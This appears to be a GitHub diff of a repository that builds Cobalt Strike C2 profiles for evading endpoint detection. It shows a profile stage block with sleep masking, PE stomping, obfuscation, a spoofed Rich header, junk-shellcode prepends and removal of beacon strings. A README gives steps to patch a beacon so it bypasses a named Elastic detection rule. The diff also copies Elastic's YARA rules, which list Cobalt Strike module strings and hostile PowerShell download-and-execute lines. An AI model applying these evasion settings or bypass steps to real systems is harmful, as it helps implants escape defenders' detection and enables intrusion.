     247 + append "/*! jQuery UI - v1.12.1 - 2016-09-14 * http://jqueryui.com * Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js , effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect -fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effe cts/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-s ize.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mix in.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio. js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable .js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, w idgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, w idgets/sortable.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js * Copyright jQuery Foundation and other contributors; Licensed MIT */";
     248 + print;
     249 + 
     250 + }
     251 + }
     252 +}
     253 + 
     254 +stage {
     255 + set checksum "0";
     256 + set compile_time "5 May 2023 10:52:15";
     257 + set entry_point "170000";
     258 + #set image_size_x86 "6586368";
     259 + #set image_size_x64 "6586368";
     260 + set name "srv.dll";
     261 + set magic_mz_x64 "OOPS";
     262 + set magic_mz_x86 "OOPS";
     263 + set userwx "false";
     264 + set cleanup "true";
     265 + set sleep_mask "true";
     266 + set stomppe "true";
     267 + set obfuscate "true";
     268 + set rich_header "\x92\x75\xde\x7f\xf0\x62\x4c\xf0\xc3\x44\x74\x97\x05\xa2\x3d\xd2\x18\xab\x08\xaa\xe9\xcf\x98\x81\x31\x90\x22";
     269 +
     270 + set sleep_mask "true";
     271 +
     272 + set smartinject "true";
     273 +
     274 + #set allocator "HeapAlloc";
     275 + set magic_pe "EA";
     276 + 
     277 + set module_x86 "wwanmm.dll";
     278 + set module_x64 "wwanmm.dll";
     279 + 
     280 + transform-x86 {
     281 + prepend "\x48\x0f\x1f\x00\x66\x90\x43\x66\x87\xdb\x66\x87\xd2\x40\x45\x49\x41\x87\xd2\x\x47\x87\xdb\x4c\x0f\x1f\x00\x0f\x1f\x00\x66\x87\xc9\x0f\x1f\x04\x00\x42\x66\x0f\x1f\x04\x00\x90\x87\xc9\x44\x46\x40";
     282 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     283 + strrep "ReflectiveLoader" "";
     284 + strrep "beacon.dll" "";
     285 + strrep "beacon.dll" ""; # Remove this text
     286 + strrep "msvcrt.dll" "";
     287 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     288 + }
     289 + 
     290 + transform-x64 {
     291 + prepend "\x48\x0f\x1f\x00\x66\x90\x43\x66\x87\xdb\x66\x87\xd2\x40\x45\x49\x41\x87\xd2\x\x47\x87\xdb\x4c\x0f\x1f\x00\x0f\x1f\x00\x66\x87\xc9\x0f\x1f\x04\x00\x42\x66\x0f\x1f\x04\x00\x90\x87\xc9\x44\x46\x40";
     292 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     293 + strrep "ReflectiveLoader" "";
     294 + strrep "beacon.x64.dll" "";
     295 + strrep "beacon.dll" ""; # Remove this text
     296 + strrep "msvcrt.dll" "";
     297 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     298 + strrep "Stack around the variable" "";
     299 + strrep "was corrupted." "";
     300 + strrep "The variable" "";
     301 + strrep "is being used without being initialized." "";
     302 + strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
     303 + strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
     304 + strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
     305 + strrep "Stack memory was corrupted" "";
     306 + strrep "A local variable was used before it was initialized" "";
     307 + strrep "Stack memory around _alloca was corrupted" "";
     308 + strrep "Unknown Runtime Check Error" "";
     309 + strrep "Unknown Filename" "";
     310 + strrep "Unknown Module Name" "";
     311 + strrep "Run-Time Check Failure" "";
     312 + strrep "Stack corrupted near unknown variable" "";
     313 + strrep "Stack pointer corruption" "";
     314 + strrep "Cast to smaller type causing loss of data" "";
     315 + strrep "Stack memory corruption" "";
     316 + strrep "Local variable used before initialization" "";
     317 + strrep "Stack around" "corrupted";
     318 + strrep "operator" "";
     319 + strrep "operator co_await" "";
     320 + strrep "operator<=>" "";
     321 +}
     322 + 
  • ■ ■ ■ ■ ■ ■
    README.md
    1 1  # Malleable-CS-Profiles
    2  -A list of python tools to help create an OPSEC-safe Cobalt Strike profile.
     2 +A list of python tools to help create an OPSEC-safe Cobalt Strike profile. This is the Github repository of the relevant blog post: [Unleashing the Unseen: Harnessing the Power of Cobalt Strike Profiles for EDR Evasion](https://whiteknightlabs.com/2023/05/19/unleashing-the-unseen-harnessing-the-power-of-cobalt-strike-profiles-for-edr-evasion/)
     3 + 
     4 +## Usage
     5 + 
     6 +### prepend.py
     7 +Is a python script which generates dynamic junk shellcode which will be appended on the beginning of the actual shellcode. To use the script, execute:
     8 +```bash
     9 +python3 prepend.py
     10 +```
     11 + 
     12 +Copy the output and paste it in the profile (inside transform-x64 or transform-x86 block). The profile will look like the following:
     13 +```
     14 +transform-x64 {
     15 + ...
     16 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     17 + ...
     18 +}
     19 +```
     20 + 
     21 +### rich_header.py
     22 +Is a python script which generates dynamic shellcode that is responsible for the meta-information inserted by the compiler. The Rich header is a PE section that serves as a fingerprint of a Windows' executable’s build environment. To use the script, execute:
     23 +```bash
     24 +python3 rich_header.py
     25 +```
     26 + 
     27 +Copy the output and paste it in the profile (inside transform-x64 or transform-x86 block). The profile will look like the following:
     28 +```
     29 +stage {
     30 + ...
     31 + set rich_header "\x2e\x9a\xad\xf1...";
     32 + ...
     33 +}
     34 +```
     35 + 
     36 +### rule_f0b627fc_bypass.py
     37 +Is a python script which modifies the shellcode in order bypass rule `Windows_Trojan_CobaltStrike_f0b627fc` from Elastic. To use the script, execute:
     38 +```bash
     39 +python3 rule_f0b627fc_bypass.py beacon_x64.bin
     40 +```
     41 + 
     42 +Then use the generated beacon as your new shellcode.
     43 + 
     44 +## Profiles
     45 + 
     46 +To use profiles in Cobalt Strike, execute the following command:
     47 +```bash
     48 +bash teamserver <your_ip> <your_password> <path/to/your.profile>
     49 +```
     50 + 
     51 +## References
     52 +https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
     53 +https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar
     54 +https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/amazon_event
     55 + 
     56 +## Author
     57 +Kleiton Kurti ([@kleiton0x00](https://github.com/kleiton0x00))
    3 58   
  • ■ ■ ■ ■ ■ ■
    Windows_Trojan_CobaltStrike.yar
     1 +rule Windows_Trojan_CobaltStrike_c851687a {
     2 + meta:
     3 + author = "Elastic Security"
     4 + id = "c851687a-aac6-43e7-a0b6-6aed36dcf12e"
     5 + fingerprint = "70224e28a223d09f2211048936beb9e2d31c0312c97a80e22c85e445f1937c10"
     6 + creation_date = "2021-03-23"
     7 + last_modified = "2021-08-23"
     8 + description = "Identifies UAC Bypass module from Cobalt Strike"
     9 + threat_name = "Windows.Trojan.CobaltStrike"
     10 + severity = 100
     11 + arch_context = "x86"
     12 + scan_context = "file, memory"
     13 + license = "Elastic License v2"
     14 + os = "windows"
     15 + strings:
     16 + $a1 = "bypassuac.dll" ascii fullword
     17 + $a2 = "bypassuac.x64.dll" ascii fullword
     18 + $a3 = "\\\\.\\pipe\\bypassuac" ascii fullword
     19 + $b1 = "\\System32\\sysprep\\sysprep.exe" wide fullword
     20 + $b2 = "[-] Could not write temp DLL to '%S'" ascii fullword
     21 + $b3 = "[*] Cleanup successful" ascii fullword
     22 + $b4 = "\\System32\\cliconfg.exe" wide fullword
     23 + $b5 = "\\System32\\eventvwr.exe" wide fullword
     24 + $b6 = "[-] %S ran too long. Could not terminate the process." ascii fullword
     25 + $b7 = "[*] Wrote hijack DLL to '%S'" ascii fullword
     26 + $b8 = "\\System32\\sysprep\\" wide fullword
     27 + $b9 = "[-] COM initialization failed." ascii fullword
     28 + $b10 = "[-] Privileged file copy failed: %S" ascii fullword
     29 + $b11 = "[-] Failed to start %S: %d" ascii fullword
     30 + $b12 = "ReflectiveLoader"
     31 + $b13 = "[-] '%S' exists in DLL hijack location." ascii fullword
     32 + $b14 = "[-] Cleanup failed. Remove: %S" ascii fullword
     33 + $b15 = "[+] %S ran and exited." ascii fullword
     34 + $b16 = "[+] Privileged file copy success! %S" ascii fullword
     35 + condition:
     36 + 2 of ($a*) or 10 of ($b*)
     37 +}
     38 + 
     39 +rule Windows_Trojan_CobaltStrike_0b58325e {
     40 + meta:
     41 + author = "Elastic Security"
     42 + id = "0b58325e-2538-434d-9a2c-26e2c32db039"
     43 + fingerprint = "8ecd5bdce925ae5d4f90cecb9bc8c3901b54ba1c899a33354bcf529eeb2485d4"
     44 + creation_date = "2021-03-23"
     45 + last_modified = "2021-08-23"
     46 + description = "Identifies Keylogger module from Cobalt Strike"
     47 + threat_name = "Windows.Trojan.CobaltStrike"
     48 + severity = 100
     49 + arch_context = "x86"
     50 + scan_context = "file, memory"
     51 + license = "Elastic License v2"
     52 + os = "windows"
     53 + strings:
     54 + $a1 = "keylogger.dll" ascii fullword
     55 + $a2 = "keylogger.x64.dll" ascii fullword
     56 + $a3 = "\\\\.\\pipe\\keylogger" ascii fullword
     57 + $a4 = "%cE=======%c" ascii fullword
     58 + $a5 = "[unknown: %02X]" ascii fullword
     59 + $b1 = "ReflectiveLoader"
     60 + $b2 = "%c2%s%c" ascii fullword
     61 + $b3 = "[numlock]" ascii fullword
     62 + $b4 = "%cC%s" ascii fullword
     63 + $b5 = "[backspace]" ascii fullword
     64 + $b6 = "[scroll lock]" ascii fullword
     65 + $b7 = "[control]" ascii fullword
     66 + $b8 = "[left]" ascii fullword
     67 + $b9 = "[page up]" ascii fullword
     68 + $b10 = "[page down]" ascii fullword
     69 + $b11 = "[prtscr]" ascii fullword
     70 + $b12 = "ZRich9" ascii fullword
     71 + $b13 = "[ctrl]" ascii fullword
     72 + $b14 = "[home]" ascii fullword
     73 + $b15 = "[pause]" ascii fullword
     74 + $b16 = "[clear]" ascii fullword
     75 + condition:
     76 + 1 of ($a*) and 14 of ($b*)
     77 +}
     78 + 
     79 +rule Windows_Trojan_CobaltStrike_2b8cddf8 {
     80 + meta:
     81 + author = "Elastic Security"
     82 + id = "2b8cddf8-ca7a-4f85-be9d-6d8534d0482e"
     83 + fingerprint = "0d7d28d79004ca61b0cfdcda29bd95e3333e6fc6e6646a3f6ba058aa01bee188"
     84 + creation_date = "2021-03-23"
     85 + last_modified = "2021-08-23"
     86 + description = "Identifies dll load module from Cobalt Strike"
     87 + threat_name = "Windows.Trojan.CobaltStrike"
     88 + severity = 100
     89 + arch_context = "x86"
     90 + scan_context = "file, memory"
     91 + license = "Elastic License v2"
     92 + os = "windows"
     93 + strings:
     94 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\dllload.x64.o" ascii fullword
     95 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\dllload.x86.o" ascii fullword
     96 + $b1 = "__imp_BeaconErrorDD" ascii fullword
     97 + $b2 = "__imp_BeaconErrorNA" ascii fullword
     98 + $b3 = "__imp_BeaconErrorD" ascii fullword
     99 + $b4 = "__imp_BeaconDataInt" ascii fullword
     100 + $b5 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword
     101 + $b6 = "__imp_KERNEL32$OpenProcess" ascii fullword
     102 + $b7 = "__imp_KERNEL32$CreateRemoteThread" ascii fullword
     103 + $b8 = "__imp_KERNEL32$VirtualAllocEx" ascii fullword
     104 + $c1 = "__imp__BeaconErrorDD" ascii fullword
     105 + $c2 = "__imp__BeaconErrorNA" ascii fullword
     106 + $c3 = "__imp__BeaconErrorD" ascii fullword
     107 + $c4 = "__imp__BeaconDataInt" ascii fullword
     108 + $c5 = "__imp__KERNEL32$WriteProcessMemory" ascii fullword
     109 + $c6 = "__imp__KERNEL32$OpenProcess" ascii fullword
     110 + $c7 = "__imp__KERNEL32$CreateRemoteThread" ascii fullword
     111 + $c8 = "__imp__KERNEL32$VirtualAllocEx" ascii fullword
     112 + condition:
     113 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     114 +}
     115 + 
     116 +rule Windows_Trojan_CobaltStrike_59b44767 {
     117 + meta:
     118 + author = "Elastic Security"
     119 + id = "59b44767-c9a5-42c0-b177-7fe49afd7dfb"
     120 + fingerprint = "882886a282ec78623a0d3096be3d324a8a1b8a23bcb88ea0548df2fae5e27aa5"
     121 + creation_date = "2021-03-23"
     122 + last_modified = "2021-08-23"
     123 + description = "Identifies getsystem module from Cobalt Strike"
     124 + threat_name = "Windows.Trojan.CobaltStrike"
     125 + severity = 100
     126 + arch_context = "x86"
     127 + scan_context = "file, memory"
     128 + license = "Elastic License v2"
     129 + os = "windows"
     130 + strings:
     131 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\getsystem.x86.o" ascii fullword
     132 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\getsystem.x64.o" ascii fullword
     133 + $b1 = "getsystem failed." ascii fullword
     134 + $b2 = "_isSystemSID" ascii fullword
     135 + $b3 = "__imp__NTDLL$NtQuerySystemInformation@16" ascii fullword
     136 + $c1 = "getsystem failed." ascii fullword
     137 + $c2 = "$pdata$isSystemSID" ascii fullword
     138 + $c3 = "$unwind$isSystemSID" ascii fullword
     139 + $c4 = "__imp_NTDLL$NtQuerySystemInformation" ascii fullword
     140 + condition:
     141 + 1 of ($a*) or 3 of ($b*) or 3 of ($c*)
     142 +}
     143 + 
     144 +rule Windows_Trojan_CobaltStrike_7efd3c3f {
     145 + meta:
     146 + author = "Elastic Security"
     147 + id = "7efd3c3f-1104-4b46-9d1e-dc2c62381b8c"
     148 + fingerprint = "9e7c7c9a7436f5ee4c27fd46d6f06e7c88f4e4d1166759573cedc3ed666e1838"
     149 + creation_date = "2021-03-23"
     150 + last_modified = "2021-08-23"
     151 + description = "Identifies Hashdump module from Cobalt Strike"
     152 + threat_name = "Windows.Trojan.CobaltStrike"
     153 + severity = 70
     154 + arch_context = "x86"
     155 + scan_context = "file, memory"
     156 + license = "Elastic License v2"
     157 + os = "windows"
     158 + strings:
     159 + $a1 = "hashdump.dll" ascii fullword
     160 + $a2 = "hashdump.x64.dll" ascii fullword
     161 + $a3 = "\\\\.\\pipe\\hashdump" ascii fullword
     162 + $a4 = "ReflectiveLoader"
     163 + $a5 = "Global\\SAM" ascii fullword
     164 + $a6 = "Global\\FREE" ascii fullword
     165 + $a7 = "[-] no results." ascii fullword
     166 + condition:
     167 + 4 of ($a*)
     168 +}
     169 + 
     170 +rule Windows_Trojan_CobaltStrike_6e971281 {
     171 + meta:
     172 + author = "Elastic Security"
     173 + id = "6e971281-3ee3-402f-8a72-745ec8fb91fb"
     174 + fingerprint = "62d97cf73618a1b4d773d5494b2761714be53d5cda774f9a96eaa512c8d5da12"
     175 + creation_date = "2021-03-23"
     176 + last_modified = "2021-08-23"
     177 + description = "Identifies Interfaces module from Cobalt Strike"
     178 + threat_name = "Windows.Trojan.CobaltStrike"
     179 + severity = 100
     180 + arch_context = "x86"
     181 + scan_context = "file, memory"
     182 + license = "Elastic License v2"
     183 + os = "windows"
     184 + strings:
     185 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\interfaces.x64.o" ascii fullword
     186 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\interfaces.x86.o" ascii fullword
     187 + $b1 = "__imp_BeaconFormatAlloc" ascii fullword
     188 + $b2 = "__imp_BeaconFormatPrintf" ascii fullword
     189 + $b3 = "__imp_BeaconOutput" ascii fullword
     190 + $b4 = "__imp_KERNEL32$LocalAlloc" ascii fullword
     191 + $b5 = "__imp_KERNEL32$LocalFree" ascii fullword
     192 + $b6 = "__imp_LoadLibraryA" ascii fullword
     193 + $c1 = "__imp__BeaconFormatAlloc" ascii fullword
     194 + $c2 = "__imp__BeaconFormatPrintf" ascii fullword
     195 + $c3 = "__imp__BeaconOutput" ascii fullword
     196 + $c4 = "__imp__KERNEL32$LocalAlloc" ascii fullword
     197 + $c5 = "__imp__KERNEL32$LocalFree" ascii fullword
     198 + $c6 = "__imp__LoadLibraryA" ascii fullword
     199 + condition:
     200 + 1 of ($a*) or 4 of ($b*) or 4 of ($c*)
     201 +}
     202 + 
     203 +rule Windows_Trojan_CobaltStrike_09b79efa {
     204 + meta:
     205 + author = "Elastic Security"
     206 + id = "09b79efa-55d7-481d-9ee0-74ac5f787cef"
     207 + fingerprint = "04ef6555e8668c56c528dc62184331a6562f47652c73de732e5f7c82779f2fd8"
     208 + creation_date = "2021-03-23"
     209 + last_modified = "2021-08-23"
     210 + description = "Identifies Invoke Assembly module from Cobalt Strike"
     211 + threat_name = "Windows.Trojan.CobaltStrike"
     212 + severity = 100
     213 + arch_context = "x86"
     214 + scan_context = "file, memory"
     215 + license = "Elastic License v2"
     216 + os = "windows"
     217 + strings:
     218 + $a1 = "invokeassembly.x64.dll" ascii fullword
     219 + $a2 = "invokeassembly.dll" ascii fullword
     220 + $b1 = "[-] Failed to get default AppDomain w/hr 0x%08lx" ascii fullword
     221 + $b2 = "[-] Failed to load the assembly w/hr 0x%08lx" ascii fullword
     222 + $b3 = "[-] Failed to create the runtime host" ascii fullword
     223 + $b4 = "[-] Invoke_3 on EntryPoint failed." ascii fullword
     224 + $b5 = "[-] CLR failed to start w/hr 0x%08lx" ascii fullword
     225 + $b6 = "ReflectiveLoader"
     226 + $b7 = ".NET runtime [ver %S] cannot be loaded" ascii fullword
     227 + $b8 = "[-] No .NET runtime found. :(" ascii fullword
     228 + $b9 = "[-] ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx" ascii fullword
     229 + $c1 = { FF 57 0C 85 C0 78 40 8B 45 F8 8D 55 F4 8B 08 52 50 }
     230 + condition:
     231 + 1 of ($a*) or 3 of ($b*) or 1 of ($c*)
     232 +}
     233 + 
     234 +rule Windows_Trojan_CobaltStrike_6e77233e {
     235 + meta:
     236 + author = "Elastic Security"
     237 + id = "6e77233e-7fb4-4295-823d-f97786c5d9c4"
     238 + fingerprint = "cef2949eae78b1c321c2ec4010749a5ac0551d680bd5eb85493fc88c5227d285"
     239 + creation_date = "2021-03-23"
     240 + last_modified = "2021-08-23"
     241 + description = "Identifies Kerberos module from Cobalt Strike"
     242 + threat_name = "Windows.Trojan.CobaltStrike"
     243 + severity = 100
     244 + arch_context = "x86"
     245 + scan_context = "file, memory"
     246 + license = "Elastic License v2"
     247 + os = "windows"
     248 + strings:
     249 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\kerberos.x64.o" ascii fullword
     250 + $a2 = "$unwind$command_kerberos_ticket_use" ascii fullword
     251 + $a3 = "$pdata$command_kerberos_ticket_use" ascii fullword
     252 + $a4 = "command_kerberos_ticket_use" ascii fullword
     253 + $a5 = "$pdata$command_kerberos_ticket_purge" ascii fullword
     254 + $a6 = "command_kerberos_ticket_purge" ascii fullword
     255 + $a7 = "$unwind$command_kerberos_ticket_purge" ascii fullword
     256 + $a8 = "$unwind$kerberos_init" ascii fullword
     257 + $a9 = "$unwind$KerberosTicketUse" ascii fullword
     258 + $a10 = "KerberosTicketUse" ascii fullword
     259 + $a11 = "$unwind$KerberosTicketPurge" ascii fullword
     260 + $b1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\kerberos.x86.o" ascii fullword
     261 + $b2 = "_command_kerberos_ticket_use" ascii fullword
     262 + $b3 = "_command_kerberos_ticket_purge" ascii fullword
     263 + $b4 = "_kerberos_init" ascii fullword
     264 + $b5 = "_KerberosTicketUse" ascii fullword
     265 + $b6 = "_KerberosTicketPurge" ascii fullword
     266 + $b7 = "_LsaCallKerberosPackage" ascii fullword
     267 + condition:
     268 + 5 of ($a*) or 3 of ($b*)
     269 +}
     270 + 
     271 +rule Windows_Trojan_CobaltStrike_de42495a {
     272 + meta:
     273 + author = "Elastic Security"
     274 + id = "de42495a-0002-466e-98b9-19c9ebb9240e"
     275 + fingerprint = "dab3c25809ec3af70df5a8a04a2efd4e8ecb13a4c87001ea699e7a1512973b82"
     276 + creation_date = "2021-03-23"
     277 + last_modified = "2021-08-23"
     278 + description = "Identifies Mimikatz module from Cobalt Strike"
     279 + threat_name = "Windows.Trojan.CobaltStrike"
     280 + severity = 100
     281 + arch_context = "x86"
     282 + scan_context = "file, memory"
     283 + license = "Elastic License v2"
     284 + os = "windows"
     285 + strings:
     286 + $a1 = "\\\\.\\pipe\\mimikatz" ascii fullword
     287 + $b1 = "ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Da" wide
     288 + $b2 = "ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" wide fullword
     289 + $b3 = "ERROR kuhl_m_lsadump_getUsersAndSamKey ; kuhl_m_lsadump_getSamKey KO" wide fullword
     290 + $b4 = "ERROR kuhl_m_lsadump_getComputerAndSyskey ; kull_m_registry_RegOpenKeyEx LSA KO" wide fullword
     291 + $b5 = "ERROR kuhl_m_lsadump_lsa_getHandle ; OpenProcess (0x%08x)" wide fullword
     292 + $b6 = "ERROR kuhl_m_lsadump_enumdomains_users ; SamLookupNamesInDomain: %08x" wide fullword
     293 + $b7 = "mimikatz(powershell) # %s" wide fullword
     294 + $b8 = "powershell_reflective_mimikatz" ascii fullword
     295 + $b9 = "mimikatz_dpapi_cache.ndr" wide fullword
     296 + $b10 = "mimikatz.log" wide fullword
     297 + $b11 = "ERROR mimikatz_doLocal" wide
     298 + $b12 = "mimikatz_x64.compressed" wide
     299 + condition:
     300 + 1 of ($a*) and 7 of ($b*)
     301 +}
     302 + 
     303 +rule Windows_Trojan_CobaltStrike_72f68375 {
     304 + meta:
     305 + author = "Elastic Security"
     306 + id = "72f68375-35ab-49cc-905d-15302389a236"
     307 + fingerprint = "ecc28f414b2c347722b681589da8529c6f3af0491845453874f8fd87c2ae86d7"
     308 + creation_date = "2021-03-23"
     309 + last_modified = "2021-08-23"
     310 + description = "Identifies Netdomain module from Cobalt Strike"
     311 + threat_name = "Windows.Trojan.CobaltStrike"
     312 + severity = 100
     313 + arch_context = "x86"
     314 + scan_context = "file, memory"
     315 + license = "Elastic License v2"
     316 + os = "windows"
     317 + strings:
     318 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\net_domain.x64.o" ascii fullword
     319 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\net_domain.x86.o" ascii fullword
     320 + $b1 = "__imp_BeaconPrintf" ascii fullword
     321 + $b2 = "__imp_NETAPI32$NetApiBufferFree" ascii fullword
     322 + $b3 = "__imp_NETAPI32$DsGetDcNameA" ascii fullword
     323 + $c1 = "__imp__BeaconPrintf" ascii fullword
     324 + $c2 = "__imp__NETAPI32$NetApiBufferFree" ascii fullword
     325 + $c3 = "__imp__NETAPI32$DsGetDcNameA" ascii fullword
     326 + condition:
     327 + 1 of ($a*) or 2 of ($b*) or 2 of ($c*)
     328 +}
     329 + 
     330 +rule Windows_Trojan_CobaltStrike_15f680fb {
     331 + meta:
     332 + author = "Elastic Security"
     333 + id = "15f680fb-a04f-472d-a182-0b9bee111351"
     334 + fingerprint = "0ecb8e41c01bf97d6dea4cf6456b769c6dd2a037b37d754f38580bcf561e1d2c"
     335 + creation_date = "2021-03-23"
     336 + last_modified = "2021-08-23"
     337 + description = "Identifies Netview module from Cobalt Strike"
     338 + threat_name = "Windows.Trojan.CobaltStrike"
     339 + severity = 100
     340 + arch_context = "x86"
     341 + scan_context = "file, memory"
     342 + license = "Elastic License v2"
     343 + os = "windows"
     344 + strings:
     345 + $a1 = "netview.x64.dll" ascii fullword
     346 + $a2 = "netview.dll" ascii fullword
     347 + $a3 = "\\\\.\\pipe\\netview" ascii fullword
     348 + $b1 = "Sessions for \\\\%s:" ascii fullword
     349 + $b2 = "Account information for %s on \\\\%s:" ascii fullword
     350 + $b3 = "Users for \\\\%s:" ascii fullword
     351 + $b4 = "Shares at \\\\%s:" ascii fullword
     352 + $b5 = "ReflectiveLoader" ascii fullword
     353 + $b6 = "Password changeable" ascii fullword
     354 + $b7 = "User's Comment" wide fullword
     355 + $b8 = "List of hosts for domain '%s':" ascii fullword
     356 + $b9 = "Password changeable" ascii fullword
     357 + $b10 = "Logged on users at \\\\%s:" ascii fullword
     358 + condition:
     359 + 2 of ($a*) or 6 of ($b*)
     360 +}
     361 + 
     362 +rule Windows_Trojan_CobaltStrike_5b4383ec {
     363 + meta:
     364 + author = "Elastic Security"
     365 + id = "5b4383ec-3c93-4e91-850e-d43cc3a86710"
     366 + fingerprint = "283d3d2924e92b31f26ec4fc6b79c51bd652fb1377b6985b003f09f8c3dba66c"
     367 + creation_date = "2021-03-23"
     368 + last_modified = "2021-08-23"
     369 + description = "Identifies Portscan module from Cobalt Strike"
     370 + threat_name = "Windows.Trojan.CobaltStrike"
     371 + severity = 100
     372 + arch_context = "x86"
     373 + scan_context = "file, memory"
     374 + license = "Elastic License v2"
     375 + os = "windows"
     376 + strings:
     377 + $a1 = "portscan.x64.dll" ascii fullword
     378 + $a2 = "portscan.dll" ascii fullword
     379 + $a3 = "\\\\.\\pipe\\portscan" ascii fullword
     380 + $b1 = "(ICMP) Target '%s' is alive. [read %d bytes]" ascii fullword
     381 + $b2 = "(ARP) Target '%s' is alive. " ascii fullword
     382 + $b3 = "TARGETS!12345" ascii fullword
     383 + $b4 = "ReflectiveLoader" ascii fullword
     384 + $b5 = "%s:%d (platform: %d version: %d.%d name: %S domain: %S)" ascii fullword
     385 + $b6 = "Scanner module is complete" ascii fullword
     386 + $b7 = "pingpong" ascii fullword
     387 + $b8 = "PORTS!12345" ascii fullword
     388 + $b9 = "%s:%d (%s)" ascii fullword
     389 + $b10 = "PREFERENCES!12345" ascii fullword
     390 + condition:
     391 + 2 of ($a*) or 6 of ($b*)
     392 +}
     393 + 
     394 +rule Windows_Trojan_CobaltStrike_91e08059 {
     395 + meta:
     396 + author = "Elastic Security"
     397 + id = "91e08059-46a8-47d0-91c9-e86874951a4a"
     398 + fingerprint = "d8baacb58a3db00489827275ad6a2d007c018eaecbce469356b068d8a758634b"
     399 + creation_date = "2021-03-23"
     400 + last_modified = "2021-08-23"
     401 + description = "Identifies Post Ex module from Cobalt Strike"
     402 + threat_name = "Windows.Trojan.CobaltStrike"
     403 + severity = 100
     404 + arch_context = "x86"
     405 + scan_context = "file, memory"
     406 + license = "Elastic License v2"
     407 + os = "windows"
     408 + strings:
     409 + $a1 = "postex.x64.dll" ascii fullword
     410 + $a2 = "postex.dll" ascii fullword
     411 + $a3 = "RunAsAdminCMSTP" ascii fullword
     412 + $a4 = "KerberosTicketPurge" ascii fullword
     413 + $b1 = "GetSystem" ascii fullword
     414 + $b2 = "HelloWorld" ascii fullword
     415 + $b3 = "KerberosTicketUse" ascii fullword
     416 + $b4 = "SpawnAsAdmin" ascii fullword
     417 + $b5 = "RunAsAdmin" ascii fullword
     418 + $b6 = "NetDomain" ascii fullword
     419 + condition:
     420 + 2 of ($a*) or 4 of ($b*)
     421 +}
     422 + 
     423 +rule Windows_Trojan_CobaltStrike_ee756db7 {
     424 + meta:
     425 + author = "Elastic Security"
     426 + id = "ee756db7-e177-41f0-af99-c44646d334f7"
     427 + fingerprint = "e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71"
     428 + creation_date = "2021-03-23"
     429 + last_modified = "2021-08-23"
     430 + description = "Attempts to detect Cobalt Strike based on strings found in BEACON"
     431 + threat_name = "Windows.Trojan.CobaltStrike"
     432 + severity = 100
     433 + arch_context = "x86"
     434 + scan_context = "file, memory"
     435 + license = "Elastic License v2"
     436 + os = "windows"
     437 + strings:
     438 + $a1 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     439 + $a2 = "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     440 + $a3 = "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset." ascii fullword
     441 + $a4 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" ascii fullword
     442 + $a5 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')" ascii fullword
     443 + $a6 = "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     444 + $a7 = "could not run command (w/ token) because of its length of %d bytes!" ascii fullword
     445 + $a8 = "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     446 + $a9 = "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     447 + $a10 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" ascii fullword
     448 + $a11 = "Could not open service control manager on %s: %d" ascii fullword
